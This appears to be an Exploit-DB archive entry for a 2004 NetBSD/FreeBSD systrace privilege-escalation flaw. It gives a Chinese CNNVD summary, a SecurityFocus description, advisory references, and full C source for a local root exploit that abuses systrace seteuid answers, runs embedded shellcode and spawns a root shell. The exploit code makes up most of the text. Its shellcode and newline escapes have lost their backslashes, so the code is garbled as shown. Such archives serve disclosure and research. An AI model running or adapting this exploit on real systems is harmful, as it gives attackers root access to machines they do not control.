https://www.exploit-db.com/exploits/24113
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-678

NetBSD/FreeBSD是开放源代码操作系统，Systrace可通过强制系统调用的访问策略监视并且控制应用程序访问系统。NetBSD/FreeBSD的Systrace的实现存在访问验证问题，本地攻击者可以利用这个漏洞提升权限。systrace_exit()没有检查连接到systrace的进程是否属于超级用户权限，在exit操作时会设置EUID为0，因此本地攻击者可以利用这个问题提升权限。

source: http://www.securityfocus.com/bid/10320/info

A vulnerability has been reported that affects Systrace on NetBSD, as well as the FreeBSD port by Vladimir Kotal. 

The source of the issue is insufficient access validation when a systraced process is restoring privileges. 

This issue can be exploited by a local attacker to gain root privileges on a vulnerable system.

#include <stdio.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/systrace.h>

#define systrace_device "/dev/systrace"

char MAGIC[] = "x53x31xc0x50x50x50x50xb8x03x00x00x00"
        "xcdx80x83xc4x10xb8x00x00xc0xbfx94x50"
        "xb8x03x00x00x00xcdx80x5bx87xe3x5bxc3";

void (*magic)(void) = MAGIC;

int nbsd_systrace_open()
{
        int fd;

        printf("[+] Connecting to %s... ", systrace_device);
        fd = open(systrace_device, O_RDONLY, 0);
        if (fd == -1) {
                perror("failed with error: ");
                printf("nSorry but the exploit failedn");
                exit(1);
        }
        printf("done.n");

        return (fd);
}

int nbsd_attach_parent(int fd)
{
        pid_t pid = getppid();

        printf("[+] Attaching to parent... ");
        if (ioctl(fd, STRIOCATTACH, &pid) == -1) {
                perror("failed with error: ");
                printf("nSorry but the exploit failedn");
        }
        printf("done.n");
        return (0);
}

void nbsd_handle_msg(int fd)
{
        struct str_message msg;
        struct systrace_answer ans;
        int r;

        r = read(fd, &msg, sizeof(msg));

        if (r != sizeof(msg)) {
                exit(1);
        }

        memset(&ans, 0, sizeof(ans));
        ans.stra_pid = msg.msg_pid;
        ans.stra_seqnr = msg.msg_seqnr;
        ans.stra_policy = SYSTR_POLICY_PERMIT;
        ans.stra_flags =
SYSTR_FLAGS_RESULT|SYSTR_FLAGS_SETEUID|SYSTR_FLAGS_SETEUID;
        ans.stra_error = 0;
        ans.stra_seteuid = getuid();
        ans.stra_setegid = getgid();

        if (ioctl(fd, STRIOCANSWER, &ans) == -1);

}

void doit()
{
        int p,f,fd;

        fd = nbsd_systrace_open();

        f = fork();

        if (f == 0) {
                sleep(1);
                nbsd_attach_parent(fd);
                while (1) {
                        nbsd_handle_msg(fd);
                }
                exit(1);
        }
        printf("[+] Doing some magic... ");
        sleep(2);
        magic();

        setuid(0);
        setgid(0);

        kill(f, 9);

        if (getuid() != 0) {
                printf("failed.n");
                printf("nSorry but the exploit failed.");
                exit(1);
        }

        printf("done.nn");

        system("uname -v");
        system("id");
        execlp("/bin/sh", "/bin/sh", 0);
}

void banner()
{
        printf("NetBSD/x86 systrace local root exploitn");
        printf("by ziegenpeternn");

        if (getuid() == 0) {
                printf("no commentn");
                exit(1);
        }
}

int main(int argc, char **argv)
{
        int fd;
        banner();
        doit();
        return (0);
}

来源:XF
名称:systrace-gain-privileges(16110)
链接:http://xforce.iss.net/xforce/xfdb/16110
来源:BID
名称:10320
链接:http://www.securityfocus.com/bid/10320
来源:SECUNIA
名称:11585
链接:http://secunia.com/advisories/11585
来源:BUGTRAQ
名称:20040510Advisory04/2004:Net(Free)BSDSystracelocalrootvulnerabilitiy
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108432258920570&w;=2
来源：NSFOCUS
名称：6437
链接：http://www.nsfocus.net/vulndb/6437